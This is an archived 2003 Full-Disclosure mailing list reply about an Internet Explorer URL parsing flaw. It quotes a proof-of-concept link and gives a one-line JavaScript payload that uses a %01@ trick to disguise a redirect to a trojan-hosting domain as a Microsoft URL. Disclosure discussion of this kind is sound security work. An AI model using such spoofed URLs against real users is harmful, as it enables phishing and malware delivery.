lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20031209182259.37248.qmail@web60809.mail.yahoo.com>
From: sgmasood at yahoo.com (S G Masood)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

LOL. This is so simple and dangerous, it almost made
me laugh and cry at the same time. Most of you will
realise why...;D 
The Paypal, AOL, Visa, Mastercard, et al email
scammers will have a harvest of gold this month with
lots of zombies falling for this simple technique.

># POC ##########
>http://www.zapthedingbat.com/security/ex01/vun1.htm

Dont be surprised if your latest download from
http://www.microsoft.com turns out to be a trojan!

location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadaneviltrojanfromme.com);


--
S.G.Masood

Hyderabad,
India

PS: One more thing - no scripting required to exploit this.

__________________________________
Do you Yahoo!?
Free Pop-Up Blocker - Get it now
http://companion.yahoo.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ